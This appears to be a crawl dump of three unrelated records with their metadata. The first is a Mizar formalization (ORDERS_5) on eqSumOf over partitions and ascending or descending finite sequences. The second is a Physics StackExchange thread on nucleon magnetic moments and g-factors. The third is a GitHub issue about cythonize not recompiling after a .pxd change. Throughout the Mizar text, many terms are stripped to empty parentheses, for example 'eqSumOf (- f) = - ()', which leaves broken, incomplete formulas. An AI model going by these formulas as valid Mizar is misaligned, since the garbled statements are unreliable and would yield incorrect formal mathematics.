holds\nb1 . X = Sum (f * (canFS (eqSupport (f,X)))) ) & ( for X being Element of D st X in D holds\nb2 . X = Sum (f * (canFS (eqSupport (f,X)))) ) holds\nb1 = b2\nproof end;\nend;\n\n:: deftheorem Def14 defines eqSumOf ORDERS_5:def 14 :\nfor A being set\nfor D being a_partition of A\nfor f being finite-support Function of A,REAL\nfor b4 being Function of D,REAL holds\n( b4 = D eqSumOf f iff for X being Element of D st X in D holds\nb4 . X = Sum (f * (canFS (eqSupport (f,X)))) );\n\ndefinition\nlet A be Preorder;\nlet f be finite-support Function of A,REAL;\nfunc eqSumOf f -> Function of (),REAL means :Def15: :: ORDERS_5:def 15\nex D being a_partition of the carrier of A st\n( D = the carrier of () & it = D eqSumOf f );\nexistence\nex b1 being Function of (),REAL ex D being a_partition of the carrier of A st\n( D = the carrier of () & b1 = D eqSumOf f )\nproof end;\nuniqueness\nfor b1, b2 being Function of (),REAL st ex D being a_partition of the carrier of A st\n( D = the carrier of () & b1 = D eqSumOf f ) & ex D being a_partition of the carrier of A st\n( D = the carrier of () & b2 = D eqSumOf f ) holds\nb1 = b2\n;\nend;\n\n:: deftheorem Def15 defines eqSumOf ORDERS_5:def 15 :\nfor A being Preorder\nfor f being finite-support Function of A,REAL\nfor b3 being Function of (),REAL holds\n( b3 = eqSumOf f iff ex D being a_partition of the carrier of A st\n( D = the carrier of () & b3 = D eqSumOf f ) );\n\ndefinition\nlet A be Preorder;\nlet f be finite-support Function of A,REAL;\nredefine func eqSumOf f means :Def16: :: ORDERS_5:def 16\nfor X being Element of () st X in the carrier of () holds\nit . X = Sum (f * (canFS (eqSupport (f,X))));\ncorrectness\ncompatibility\nfor b1 being Function of (),REAL holds\n( b1 = eqSumOf f iff for X being Element of () st X in the carrier of () holds\nb1 . X = Sum (f * (canFS (eqSupport (f,X)))) )\n;\nproof end;\nend;\n\n:: deftheorem Def16 defines eqSumOf ORDERS_5:def 16 :\nfor A being Preorder\nfor f being finite-support Function of A,REAL\nfor b3 being Function of (),REAL holds\n( b3 = eqSumOf f iff for X being Element of () st X in the carrier of () holds\nb3 . X = Sum (f * (canFS (eqSupport (f,X)))) );\n\ntheorem Th54: :: ORDERS_5:45\nfor A being set\nfor D being a_partition of A\nfor f being finite-support Function of A,REAL holds D eqSumOf (- f) = - (D eqSumOf f)\nproof end;\n\ntheorem Th55: :: ORDERS_5:46\nfor A being Preorder\nfor f being finite-support Function of A,REAL holds eqSumOf (- f) = - ()\nproof end;\n\nTh56: for A being set\nfor D being a_partition of A\nfor f being nonnegative-yielding finite-support Function of A,REAL holds D eqSumOf f is nonnegative-yielding\n\nproof end;\n\nregistration\nlet A be Preorder;\nlet f be nonnegative-yielding finite-support Function of A,REAL;\ncoherence\nproof end;\nend;\n\nregistration\nlet A be set ;\nlet D be a_partition of A;\nlet f be nonnegative-yielding finite-support Function of A,REAL;\ncoherence by Th56;\nend;\n\ntheorem Th58: :: ORDERS_5:47\nfor A being set\nfor D being a_partition of A\nfor f being finite-support Function of A,REAL st f is nonpositive-yielding holds\nD eqSumOf f is nonpositive-yielding\nproof end;\n\ntheorem :: ORDERS_5:48\nfor A being Preorder\nfor f being finite-support Function of A,REAL st f is nonpositive-yielding holds\neqSumOf f is nonpositive-yielding\nproof end;\n\ntheorem Th60: :: ORDERS_5:49\nfor A being Preorder\nfor f being finite-support Function of A,REAL\nfor x being Element of A st ( for y being Element of A st x =~ y holds\nx = y ) holds\n(() * (proj A)) . x = f . x\nproof end;\n\ntheorem Th61: :: ORDERS_5:50\nfor A being Order\nfor f being finite-support Function of A,REAL holds () * (proj A) = f\nproof end;\n\ntheorem :: ORDERS_5:51\nfor A being Order\nfor f1, f2 being finite-support Function of A,REAL st eqSumOf f1 = eqSumOf f2 holds\nf1 = f2\nproof end;\n\ntheorem Th63: :: ORDERS_5:52\nfor A being Preorder\nfor f being finite-support Function of A,REAL holds support () c= (proj A) .: ()\nproof end;\n\ntheorem Th64: :: ORDERS_5:53\nfor A being non empty set\nfor D being non empty a_partition of A\nfor f being finite-support Function of A,REAL holds support (D eqSumOf f) c= (proj D) .: ()\nproof end;\n\n:: more general:\n:: for x holds (for y in (proj A).x holds f.y >= 0) or\n:: (for y in (proj A).x holds f.y <= 0)\ntheorem Th65: :: ORDERS_5:54\nfor A being Preorder\nfor f being finite-support Function of A,REAL st f is nonnegative-yielding holds\n(proj A) .: () = support ()\nproof end;\n\ntheorem :: ORDERS_5:55\nfor A being non empty set\nfor D being non empty a_partition of A\nfor f being finite-support Function of A,REAL st f is nonnegative-yielding holds\n(proj D) .: () = support (D eqSumOf f)\nproof end;\n\ntheorem Th67: :: ORDERS_5:56\nfor A being Preorder\nfor f being finite-support Function of A,REAL st f is nonpositive-yielding holds\n(proj A) .: () = support ()\nproof end;\n\ntheorem :: ORDERS_5:57\nfor A being non empty set\nfor D being non empty a_partition of A\nfor f being finite-support Function of A,REAL st f is nonpositive-yielding holds\n(proj D) .: () = support (D eqSumOf f)\nproof end;\n\nregistration\nlet A be Preorder;\nlet f be finite-support Function of A,REAL;\ncoherence\nproof end;\nend;\n\nregistration\nlet A be set ;\nlet D be a_partition of A;\nlet f be finite-support Function of A,REAL;\ncoherence\nproof end;\nend;\n\ntheorem Th69: :: ORDERS_5:58\nfor A being non empty set\nfor D being non empty a_partition of A\nfor f being finite-support Function of A,REAL\nfor s1 being one-to-one FinSequence of A\nfor s2 being one-to-one FinSequence of D st rng s2 = (proj D) .: (rng s1) & ( for X being Element of D st X in rng s2 holds\neqSupport (f,X) c= rng s1 ) holds\nSum ((D eqSumOf f) * s2) = Sum (f * s1)\nproof end;\n\ntheorem Th70: :: ORDERS_5:59\nfor A being non empty set\nfor D being non empty a_partition of A\nfor f being finite-support Function of A,REAL\nfor s1 being one-to-one FinSequence of A\nfor s2 being one-to-one FinSequence of D st rng s1 = support f & rng s2 = support (D eqSumOf f) holds\nSum ((D eqSumOf f) * s2) = Sum (f * s1)\nproof end;\n\ntheorem :: ORDERS_5:60\nfor A being Preorder\nfor f being finite-support Function of A,REAL\nfor s1 being one-to-one FinSequence of A\nfor s2 being one-to-one FinSequence of () st rng s1 = support f & rng s2 = support () holds\nSum (() * s2) = Sum (f * s1)\nproof end;\n\ndefinition\nlet A be RelStr ;\nlet s be FinSequence of A;\nattr s is weakly-ascending means :: ORDERS_5:def 17\nfor n, m being Nat st n in dom s & m in dom s & n < m holds\ns /. n <= s /. m;\nend;\n\n:: deftheorem defines weakly-ascending ORDERS_5:def 17 :\nfor A being RelStr\nfor s being FinSequence of A holds\n( s is weakly-ascending iff for n, m being Nat st n in dom s & m in dom s & n < m holds\ns /. n <= s /. m );\n\ndefinition\nlet A be RelStr ;\nlet s be FinSequence of A;\nattr s is ascending means :: ORDERS_5:def 18\nfor n, m being Nat st n in dom s & m in dom s & n < m holds\ns /. n <~ s /. m;\nend;\n\n:: deftheorem defines ascending ORDERS_5:def 18 :\nfor A being RelStr\nfor s being FinSequence of A holds\n( s is ascending iff for n, m being Nat st n in dom s & m in dom s & n < m holds\ns /. n <~ s /. m );\n\n:: it is surprising that this isn't a trivial proof by Def4\nregistration\nlet A be RelStr ;\ncluster ascending -> weakly-ascending for FinSequence of the carrier of A;\ncoherence\nfor b1 being FinSequence of A st b1 is ascending holds\nb1 is weakly-ascending\nproof end;\nend;\n\ndefinition\nlet A be antisymmetric RelStr ;\nlet s be FinSequence of A;\nredefine attr s is ascending means :Def19: :: ORDERS_5:def 19\nfor n, m being Nat st n in dom s & m in dom s & n < m holds\ns /. n < s /. m;\ncorrectness\ncompatibility\n( s is ascending iff for n, m being Nat st n in dom s & m in dom s & n < m holds\ns /. n < s /. m )\n;\nproof end;\nend;\n\n:: deftheorem Def19 defines ascending ORDERS_5:def 19 :\nfor A being antisymmetric RelStr\nfor s being FinSequence of A holds\n( s is ascending iff for n, m being Nat st n in dom s & m in dom s & n < m holds\ns /. n < s /. m );\n\ndefinition\nlet A be RelStr ;\nlet s be FinSequence of A;\nattr s is weakly-descending means :: ORDERS_5:def 20\nfor n, m being Nat st n in dom s & m in dom s & n < m holds\ns /. m <= s /. n;\nend;\n\n:: deftheorem defines weakly-descending ORDERS_5:def 20 :\nfor A being RelStr\nfor s being FinSequence of A holds\n( s is weakly-descending iff for n, m being Nat st n in dom s & m in dom s & n < m holds\ns /. m <= s /. n );\n\ndefinition\nlet A be RelStr ;\nlet s be FinSequence of A;\nattr s is descending means :: ORDERS_5:def 21\nfor n, m being Nat st n in dom s & m in dom s & n < m holds\ns /. m <~ s /. n;\nend;\n\n:: deftheorem defines descending ORDERS_5:def 21 :\nfor A being RelStr\nfor s being FinSequence of A holds\n( s is descending iff for n, m being Nat st n in dom s & m in dom s & n < m holds\ns /. m <~ s /. n );\n\nregistration\nlet A be RelStr ;\ncluster descending -> weakly-descending for FinSequence of the carrier of A;\ncoherence\nfor b1 being FinSequence of A st b1 is descending holds\nb1 is weakly-descending\nproof end;\nend;\n\ndefinition\nlet A be antisymmetric RelStr ;\nlet s be FinSequence of A;\nredefine attr s is descending means :: ORDERS_5:def 22\nfor n, m being Nat st n in dom s & m in dom s & n < m holds\ns /. m < s /. n;\ncorrectness\ncompatibility\n( s is descending iff for n, m being Nat st n in dom s & m in dom s & n < m holds\ns /. m < s /. n )\n;\nproof end;\nend;\n\n:: deftheorem defines descending ORDERS_5:def 22 :\nfor A being antisymmetric RelStr\nfor s being FinSequence of A holds\n( s is descending iff for n, m being Nat st n in dom s & m in dom s & n < m holds\ns /. m < s /. n );\n\nregistration\nlet A be antisymmetric RelStr ;\ncluster one-to-one weakly-ascending -> ascending for FinSequence of the carrier of A;\ncoherence\nfor b1 being FinSequence of A st b1 is one-to-one & b1 is weakly-ascending holds\nb1 is ascending\nproof end;\ncluster one-to-one weakly-descending -> descending for FinSequence of the carrier of A;\ncoherence\nfor b1 being FinSequence of A st b1 is one-to-one & b1 is weakly-descending holds\nb1 is descending\nproof end;\nend;\n\nregistration\nlet A be antisymmetric RelStr ;\ncoherence\nfor b1 being FinSequence of A st b1 is weakly-ascending & b1 is weakly-descending holds\nb1 is constant\nproof end;\nend;\n\nregistration\nlet A be reflexive RelStr ;\ncoherence\nfor b1 being FinSequence of A st b1 is constant holds\n( b1 is weakly-ascending & b1 is weakly-descending )\nproof end;\nend;\n\nregistration\nlet A be RelStr ;\ncoherence\n( <*> the carrier of A is ascending & <*> the carrier of A is weakly-ascending & <*> the carrier of A is descending & <*> the carrier of A is weakly-descending )\n;\nend;\n\nregistration\nlet A be RelStr ;\nexistence\nex b1 being FinSequence of A st\n( b1 is empty & b1 is ascending & b1 is weakly-ascending & b1 is descending & b1 is weakly-descending )\nproof end;\nend;\n\nTh72: for A being non empty RelStr\nfor x being Element of A holds\n( <*x*> is ascending & <*x*> is weakly-ascending & <*x*> is descending & <*x*> is weakly-descending )\n\nproof end;\n\nregistration\nlet A be non empty RelStr ;\nlet x be Element of A;\ncoherence\nfor b1 being FinSequence of A st b1 = <*x*> holds\n( b1 is ascending & b1 is weakly-ascending & b1 is descending & b1 is weakly-descending )\nby Th72;\nend;\n\nregistration\nlet A be non empty RelStr ;\nexistence\nex b1 being FinSequence of A st\n( not b1 is empty & b1 is one-to-one & b1 is ascending & b1 is weakly-ascending & b1 is descending & b1 is weakly-descending )\nproof end;\nend;\n\ndefinition\nlet A be RelStr ;\nlet s be FinSequence of A;\nattr s is asc_ordering means :: ORDERS_5:def 23\n( s is one-to-one & s is weakly-ascending );\nattr s is desc_ordering means :: ORDERS_5:def 24\n( s is one-to-one & s is weakly-descending );\nend;\n\n:: deftheorem defines asc_ordering ORDERS_5:def 23 :\nfor A being RelStr\nfor s being FinSequence of A holds\n( s is asc_ordering iff ( s is one-to-one & s is weakly-ascending ) );\n\n:: deftheorem defines desc_ordering ORDERS_5:def 24 :\nfor A being RelStr\nfor s being FinSequence of A holds\n( s is desc_ordering iff ( s is one-to-one & s is weakly-descending ) );\n\nregistration\nlet A be RelStr ;\ncluster asc_ordering -> one-to-one weakly-ascending for FinSequence of the carrier of A;\ncoherence\nfor b1 being FinSequence of A st b1 is asc_ordering holds\n( b1 is one-to-one & b1 is weakly-ascending )\n;\ncluster one-to-one weakly-ascending -> asc_ordering for FinSequence of the carrier of A;\ncoherence\nfor b1 being FinSequence of A st b1 is one-to-one & b1 is weakly-ascending holds\nb1 is asc_ordering\n;\ncoherence\nfor b1 being FinSequence of A st b1 is desc_ordering holds\n( b1 is one-to-one & b1 is weakly-descending )\n;\ncoherence\nfor b1 being FinSequence of A st b1 is one-to-one & b1 is weakly-descending holds\nb1 is desc_ordering\n;\nend;\n\n:: I thought the following registration would only work with trasitivity\n:: but apparently ascending implies asc_ordering\nregistration\nlet A be RelStr ;\ncluster ascending -> asc_ordering for FinSequence of the carrier of A;\ncoherence\nfor b1 being FinSequence of A st b1 is ascending holds\nb1 is asc_ordering\nproof end;\ncluster descending -> desc_ordering for FinSequence of the carrier of A;\ncoherence\nfor b1 being FinSequence of A st b1 is descending holds\nb1 is desc_ordering\nproof end;\nend;\n\ndefinition\nlet A be RelStr ;\nlet B be Subset of A;\nlet s be FinSequence of A;\nattr s is B -asc_ordering means :: ORDERS_5:def 25\n( s is asc_ordering & rng s = B );\nattr s is B -desc_ordering means :: ORDERS_5:def 26\n( s is desc_ordering & rng s = B );\nend;\n\n:: deftheorem defines -asc_ordering ORDERS_5:def 25 :\nfor A being RelStr\nfor B being Subset of A\nfor s being FinSequence of A holds\n( s is B -asc_ordering iff ( s is asc_ordering & rng s = B ) );\n\n:: deftheorem defines -desc_ordering ORDERS_5:def 26 :\nfor A being RelStr\nfor B being Subset of A\nfor s being FinSequence of A holds\n( s is B -desc_ordering iff ( s is desc_ordering & rng s = B ) );\n\nregistration\nlet A be RelStr ;\nlet B be Subset of A;\ncluster B -asc_ordering -> asc_ordering for FinSequence of the carrier of A;\ncoherence\nfor b1 being FinSequence of A st b1 is B -asc_ordering holds\nb1 is asc_ordering\n;\ncluster B -desc_ordering -> desc_ordering for FinSequence of the carrier of A;\ncoherence\nfor b1 being FinSequence of A st b1 is B -desc_ordering holds\nb1 is desc_ordering\n;\nend;\n\nregistration\nlet A be RelStr ;\nlet B be empty Subset of A;\ncluster B -asc_ordering -> empty for FinSequence of the carrier of A;\ncoherence\nfor b1 being FinSequence of A st b1 is B -asc_ordering holds\nb1 is empty\n;\ncluster B -desc_ordering -> empty for FinSequence of the carrier of A;\ncoherence\nfor b1 being FinSequence of A st b1 is B -desc_ordering holds\nb1 is empty\n;\nend;\n\ntheorem Th73: :: ORDERS_5:61\nfor A being RelStr\nfor s being FinSequence of A holds\n( s is weakly-ascending iff Rev s is weakly-descending )\nproof end;\n\ntheorem :: ORDERS_5:62\nfor A being RelStr\nfor s being FinSequence of A holds\n( s is ascending iff Rev s is descending )\nproof end;\n\ntheorem Th75: :: ORDERS_5:63\nfor A being RelStr\nfor B being Subset of A\nfor s being FinSequence of A holds\n( s is B -asc_ordering iff Rev s is B -desc_ordering )\nproof end;\n\n:: this seems trivial, I'm unsure why\ntheorem :: ORDERS_5:64\nfor A being RelStr\nfor B being Subset of A\nfor s being FinSequence of A st ( s is B -asc_ordering or s is B -desc_ordering ) holds\nB is finite ;\n\nregistration\nlet A be antisymmetric RelStr ;\ncluster asc_ordering -> ascending for FinSequence of the carrier of A;\ncoherence\nfor b1 being FinSequence of A st b1 is asc_ordering holds\nb1 is ascending\n;\ncluster desc_ordering -> descending for FinSequence of the carrier of A;\ncoherence\nfor b1 being FinSequence of A st b1 is desc_ordering holds\nb1 is descending\n;\nend;\n\ntheorem Th77: :: ORDERS_5:65\nfor A being antisymmetric RelStr\nfor B being Subset of A\nfor s1, s2 being FinSequence of A st s1 is B -asc_ordering & s2 is B -asc_ordering holds\ns1 = s2\nproof end;\n\ntheorem :: ORDERS_5:66\nfor A being antisymmetric RelStr\nfor B being Subset of A\nfor s1, s2 being FinSequence of A st s1 is B -desc_ordering & s2 is B -desc_ordering holds\ns1 = s2\nproof end;\n\ntheorem Th79: :: ORDERS_5:67\nfor A being LinearOrder\nfor B being finite Subset of A\nfor s being FinSequence of A holds\n( s is B -asc_ordering iff s = SgmX ( the InternalRel of A,B) )\nproof end;\n\nregistration\nlet A be LinearOrder;\nlet B be finite Subset of A;\ncluster SgmX ( the InternalRel of A,B) -> B -asc_ordering ;\ncoherence\nSgmX ( the InternalRel of A,B) is B -asc_ordering\nby Th79;\nend;\n\ntheorem Th80: :: ORDERS_5:68\nfor A being RelStr\nfor B, C being Subset of A\nfor s being FinSequence of A st s is B -asc_ordering & C c= B holds\nex s2 being FinSequence of A st s2 is C -asc_ordering\nproof end;\n\ntheorem :: ORDERS_5:69\nfor A being RelStr\nfor B, C being Subset of A\nfor s being FinSequence of A st s is B -desc_ordering & C c= B holds\nex s2 being FinSequence of A st s2 is C -desc_ordering\nproof end;\n\ntheorem Th82: :: ORDERS_5:70\nfor A being RelStr\nfor B being Subset of A\nfor s being FinSequence of A\nfor x being Element of A st B = {x} & s = <*x*> holds\n( s is B -asc_ordering & s is B -desc_ordering )\nproof end;\n\ntheorem Th83: :: ORDERS_5:71\nfor A being RelStr\nfor B being Subset of A\nfor s being FinSequence of A st s is B -asc_ordering holds\nthe InternalRel of A is_connected_in B\nproof end;\n\ntheorem :: ORDERS_5:72\nfor A being RelStr\nfor B being Subset of A\nfor s being FinSequence of A st s is B -desc_ordering holds\nthe InternalRel of A is_connected_in B\nproof end;\n\ntheorem Th85: :: ORDERS_5:73\nfor A being transitive RelStr\nfor B, C being Subset of A\nfor s1 being FinSequence of A\nfor x being Element of A st s1 is C -asc_ordering & not x in C & B = C \\/ {x} & ( for y being Element of A st y in C holds\nx <= y ) holds\nex s2 being FinSequence of A st\n( s2 = <*x*> ^ s1 & s2 is B -asc_ordering )\nproof end;\n\ntheorem Th86: :: ORDERS_5:74\nfor A being transitive RelStr\nfor B, C being Subset of A\nfor s1 being FinSequence of A\nfor x being Element of A st s1 is C -asc_ordering & not x in C & B = C \\/ {x} & ( for y being Element of A st y in C holds\ny <= x ) holds\nex s2 being FinSequence of A st\n( s2 = s1 ^ <*x*> & s2 is B -asc_ordering )\nproof end;\n\ntheorem :: ORDERS_5:75\nfor A being transitive RelStr\nfor B, C being Subset of A\nfor s1 being FinSequence of A\nfor x being Element of A st s1 is C -desc_ordering & not x in C & B = C \\/ {x} & ( for y being Element of A st y in C holds\nx <= y ) holds\nex s2 being FinSequence of A st\n( s2 = s1 ^ <*x*> & s2 is B -desc_ordering )\nproof end;\n\ntheorem :: ORDERS_5:76\nfor A being transitive RelStr\nfor B, C being Subset of A\nfor s1 being FinSequence of A\nfor x being Element of A st s1 is C -desc_ordering & not x in C & B = C \\/ {x} & ( for y being Element of A st y in C holds\ny <= x ) holds\nex s2 being FinSequence of A st\n( s2 = <*x*> ^ s1 & s2 is B -desc_ordering )\nproof end;\n\ntheorem Th89: :: ORDERS_5:77\nfor A being transitive RelStr\nfor B being finite Subset of A st the InternalRel of A is_connected_in B holds\nex s being FinSequence of A st s is B -asc_ordering\nproof end;\n\ntheorem :: ORDERS_5:78\nfor A being transitive RelStr\nfor B being finite Subset of A st the InternalRel of A is_connected_in B holds\nex s being FinSequence of A st s is B -desc_ordering\nproof end;\n\ntheorem Th91: :: ORDERS_5:79\nfor A being transitive connected RelStr\nfor B being finite Subset of A ex s being FinSequence of A st s is B -asc_ordering\nproof end;\n\ntheorem Th92: :: ORDERS_5:80\nfor A being transitive connected RelStr\nfor B being finite Subset of A ex s being FinSequence of A st s is B -desc_ordering\nproof end;\n\nregistration\nlet A be transitive connected RelStr ;\nlet B be finite Subset of A;\nexistence\nex b1 being FinSequence of A st b1 is B -asc_ordering\nby Th91;\nexistence\nex b1 being FinSequence of A st b1 is B -desc_ordering\nby Th92;\nend;\n\ntheorem Th93: :: ORDERS_5:81\nfor A being Preorder\nfor B being Subset of A st the InternalRel of A is_connected_in B holds\nthe InternalRel of () is_connected_in (proj A) .: B\nproof end;\n\ntheorem Th94: :: ORDERS_5:82\nfor A being Preorder\nfor B being Subset of A\nfor s1 being FinSequence of A st s1 is B -asc_ordering holds\nex s2 being FinSequence of () st s2 is (proj A) .: B -asc_ordering\nproof end;\n\ntheorem :: ORDERS_5:83\nfor A being Preorder\nfor B being Subset of A\nfor s1 being FinSequence of A st s1 is B -desc_ordering holds\nex s2 being FinSequence of () st s2 is (proj A) .: B -desc_ordering\nproof end;" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.75818545,"math_prob":0.98153603,"size":1610,"snap":"2022-05-2022-21","text_gpt3_token_len":589,"char_repetition_ratio":0.18929017,"word_repetition_ratio":0.43213296,"special_character_ratio":0.3757764,"punctuation_ratio":0.10059172,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9987983,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-05-16T09:38:07Z\",\"WARC-Record-ID\":\"<urn:uuid:0b1a885d-cf5f-46f9-9f23-0419b881fdc7>\",\"Content-Length\":\"406962\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:f559aee4-fa73-45c4-8a05-5d9ae81ee210>\",\"WARC-Concurrent-To\":\"<urn:uuid:852dbe53-96ea-4077-9dd8-bffb4d7be5ec>\",\"WARC-IP-Address\":\"212.33.73.131\",\"WARC-Target-URI\":\"http://mizar.uwb.edu.pl/version/current/html/orders_5.html\",\"WARC-Payload-Digest\":\"sha1:WZZAOZCGGIBEQHCXUFMLUD3LOPV5PFQ5\",\"WARC-Block-Digest\":\"sha1:7LKL6NXALKMHVSSLUCYJJ3MBJV63NYVE\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-21/CC-MAIN-2022-21_segments_1652662510097.3_warc_CC-MAIN-20220516073101-20220516103101-00324.warc.gz\"}"}
https://physics.stackexchange.com/questions/311101/magnetic-moments-of-nucleons
[ "# Magnetic moments of nucleons\n\nI was comparing my notes of the nuclear physics class (undergraduate level) on magnetic moments of nucleons with the Krane's explanation.\n\nIn my notes I wrote that there are two types of magnetic moments:\n\n1. The first one is the orbital one. It's written as $\\mu_l=g_l l \\mu_n$ where l is the orbital quantum number. I also wrote that $\\vec{\\mu_l}=g_l\\vec{L}$ so that this vector is parallel to $\\vec{L}$.\n\n2. The second one is the spin one. It's written as $\\mu_s=g_ss\\mu_n$ where s is the spin quantum number, s=1/2 for nucleons. Its vectorial form is $\\vec{\\mu_s}=g_s\\vec{S}$ so that this vector is parallel to $\\vec{S}$\n\nThen, the total magnetic moment is $\\vec{\\mu_j}=\\vec{\\mu_l}+\\vec{\\mu_s}$ where $\\vec{\\mu_j}=g_j\\vec{J}$. The next step on the notes is about finding the value of $g_j$. I wrote that $|\\vec{\\mu_j}|=|\\vec{\\mu_l}|\\cos{\\theta}+|\\vec{\\mu_s}|\\cos{\\varphi}$ where $\\varphi$ is the angle between $\\vec{S}$ and $\\vec{J}$ and $\\theta$ is the angle between $\\vec{L}$ and $\\vec{J}$. In the next step I substitute $|\\vec{\\mu_l}|$ with $g_l\\hbar (l(l+1))^{1/2}$, $|\\vec{\\mu_s}|$ with $g_s\\hbar (s(s+1))^{1/2}$ and $|\\vec{\\mu_j}|$ with $g_j\\hbar (j(j+1))^{1/2}$.\n\nSo here's my problem: why is $|\\vec{\\mu_l}|$ different from $\\mu_l$? In fact the first one it's written like $g_l|\\vec{L}|$ and the second one as $\\mu_ng_ll$. The same happens with $|\\vec{\\mu_s}|$ and $\\mu_s$.\n\nAlso: In my notes I wrote that $\\vec{\\mu_j}$ isn't parallel to $\\vec{J}$ and it is, in fact, rotating about $\\vec{J}$. So why $\\vec{\\mu_j}=g_j\\vec{J}$? Shouldn't $\\vec{\\mu_j}$ and $\\vec{J}$ be parallel this way?\n\nAlso: In my notes I wrote that μj→ isn't parallel to J⃗ and it is, in fact, rotating about J⃗ . So why μj→=gjJ⃗ ? Shouldn't μj→ and J⃗ be parallel this way?>\n\nThe angular momentum operators L^2 and L(z) commute with Hamiltonian and can be measured simultaneously giving the eigenvalues l(l+1) h_bar^2 and mh_bar ,\n\nhowever the other components of L namely L(x) and L(y) do not commute along with **L(z)**so they can not be measured simultaneously...meaning thereby that direction of L remains indeterminate.\n\nso one can not talk about the specific direction of orbital angular momentum L vector .\n\nSo when we describe the magnetic moment of a nucleous mue(j) = mue(l) + mue(s) (1) then\n\nmue(l) = g(l). mue(N). sqrt (l(l+1)) ,\n\nwhere mue(N) is magnetic moment of nucleon\n\nFor neutron as it is uncharged mue(l) will be zero and for proton g(l)=1\n\nso for Proton\n\nmue(lp)= mue(N). sqrt(l(l+1)) ....(2)\n\nAs nucleons are spin 1/2 particles the QM values of intrinsic magnetic moment can be written as\n\nmue(s) = g(s). mue(N) . sqrt(s(s+1))..... (3)\n\nSo Total magnetic moment component in the j direction\n\nmue(j) = mue(l) cos (l, j) + mue(s) .cos (s,j)\n\nThose Cosine terms can be calculated in terms of l, s and j values.\n\nMoreover the last nucleon in the extreme single particle model ( in odd A nucleus) and its state is to be considered which determines the magnetic moment . For even even nucleus the resultant spin is zero.\n\nso classical description is not possible.though i have seen vector model drawing of coupling of angular momentum but\n\ni think all its diagrams are not measurable. when one imposes the external magnetic field then the projections along z axis are measured.\n\nFor details see\n\nAtomic and Nuclear Physics, Vol-II,S.N. Ghoshal,S. Chand & Co., New Delhi >India,Second Edition 1998" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.879286,"math_prob":0.99954176,"size":1608,"snap":"2019-26-2019-30","text_gpt3_token_len":538,"char_repetition_ratio":0.17955112,"word_repetition_ratio":0.04385965,"special_character_ratio":0.35261193,"punctuation_ratio":0.07716049,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9999784,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-07-21T02:34:11Z\",\"WARC-Record-ID\":\"<urn:uuid:a7e73b21-a088-429b-b58f-798dcad28381>\",\"Content-Length\":\"140562\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:3e27f49c-604c-40f8-887c-f5f6dad7f8dc>\",\"WARC-Concurrent-To\":\"<urn:uuid:9a9ffd0c-33e1-4450-a090-01a696437ae8>\",\"WARC-IP-Address\":\"151.101.129.69\",\"WARC-Target-URI\":\"https://physics.stackexchange.com/questions/311101/magnetic-moments-of-nucleons\",\"WARC-Payload-Digest\":\"sha1:VYKMV6UEOQZBEOL3OI5MXK5MMMOLOGH2\",\"WARC-Block-Digest\":\"sha1:CY6JY5ESDKEDAXFLO6JGVGLL55ITZUOA\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-30/CC-MAIN-2019-30_segments_1563195526818.17_warc_CC-MAIN-20190721020230-20190721042230-00504.warc.gz\"}"}
https://github.com/cython/cython/issues/3208
[ "# cythonize does not trigger a recompile when .pxd dependency has changed #3208\n\nOpen\nopened this issue Oct 25, 2019 · 0 comments\n\n###", null, "synapticarbors commented Oct 25, 2019 • edited\n If I have a `setup.py` that looks like: ```from distutils.core import setup from distutils.extension import Extension from Cython.Build import cythonize import numpy extensions = [ Extension('mod1.ftest', ['mod1/ftest.pyx'], depends=['mod1/ftypes.pxd'], include_dirs=[numpy.get_include()]) ] setup(name='', ext_modules=cythonize(extensions, language_level='3'))``` where `mod1/ftest.pyx` looks like: ```from . ftypes cimport a_type cpdef double test_func(a_type[::1] x): cdef: int i double res res = 0.0 for i in range(x.shape): res += x[i].a1 * x[i].a3 return res``` and `mod1/ftypes.pxd` looks like: ```import numpy as np cimport numpy as np cdef packed struct a_type: np.float64 ax np.int32_t a1 np.int16_t a2 np.int32_t a3``` when I modify the contents of `mod1/ftypes.pxd`, the `cythonize` call in `setup.py` does not trigger a compilation of `ftest.pyx`. If that change involved uncommenting the first line in the `struct a_type` definition, this gives an error like: `ValueError: Buffer dtype mismatch, expected 'int32_t' but got 'double' in 'a_type.a1'` when passing in a numpy recarray that assumes that the `ax` field is now defined. This might be related to #1428. As `mod1/ftypes.pxd` is a dependency of `mod1/ftest.pyx`, it seems like perhaps the dependency tree is not complete in terms of the recompilation decision process." ]
[ null, "https://avatars3.githubusercontent.com/u/589279", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8772686,"math_prob":0.6425131,"size":946,"snap":"2019-43-2019-47","text_gpt3_token_len":245,"char_repetition_ratio":0.102972396,"word_repetition_ratio":0.24113475,"special_character_ratio":0.20824525,"punctuation_ratio":0.14054054,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9786327,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-11-12T02:17:08Z\",\"WARC-Record-ID\":\"<urn:uuid:1d848903-9eeb-47e8-b3ba-4fe954d66d77>\",\"Content-Length\":\"86026\",\"Content-Type\":\"application/http; 